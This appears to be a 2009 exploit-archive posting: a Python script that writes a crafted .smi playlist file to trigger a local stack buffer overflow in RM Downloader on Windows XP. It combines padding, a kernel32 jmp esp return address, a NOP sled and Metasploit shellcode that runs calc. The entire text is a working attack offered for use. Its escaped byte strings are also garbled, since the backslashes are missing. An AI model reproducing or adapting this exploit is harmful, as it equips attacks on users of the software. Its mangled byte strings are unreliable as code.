rmdownloaderlocal-overflow.txt
Posted on 03 May 2009
#usage: exploit.py print "**************************************************************************" print " RM Downloader (.smi) Local Stack Overflow " print " Exploit code: ThE g0bL!N" print " Tested on: Windows XP Pro SP3 (EN) " print " greetz: His0k4 Dos-Dz TeaM-Snakes Team and all My friend " print "**************************************************************************" buff = "x41" * 26083 jump = "x5Dx38x82x7C" # jmp esp kernel32.dll nops = "x90"*6 # win32_exec - EXITFUNC=seh CMD=calc Size=343 Encoder=PexAlphaNum http://metasploit.com shellcode = ( "x31xc9x83xe9xdexd9xeexd9x74x24xf4x5bx81x73x13x4b" "x1dxa3xb6x83xebxfcxe2xf4xb7xf5xe7xb6x4bx1dx28xf3" "x77x96xdfxb3x33x1cx4cx3dx04x05x28xe9x6bx1cx48xff" "xc0x29x28xb7xa5x2cx63x2fxe7x99x63xc2x4cxdcx69xbb" "x4axdfx48x42x70x49x87xb2x3exf8x28xe9x6fx1cx48xd0" "xc0x11xe8x3dx14x01xa2x5dxc0x01x28xb7xa0x94xffx92" "x4fxdex92x76x2fx96xe3x86xcexddxdbxbaxc0x5dxafx3d" "x3bx01x0ex3dx23x15x48xbfxc0x9dx13xb6x4bx1dx28xde" "x77x42x92x40x2bx4bx2ax4exc8xddxd8xe6x23xedx29xb2" "x14x75x3bx48xc1x13xf4x49xacx7exc2xdax28x1dxa3xb6") exploit = buff + jump + nops + shellcode try: out_file = open("exploit.smi",'w') out_file.write(exploit+" ") out_file.close() raw_input(" Exploit file created! ") except: print "Error"
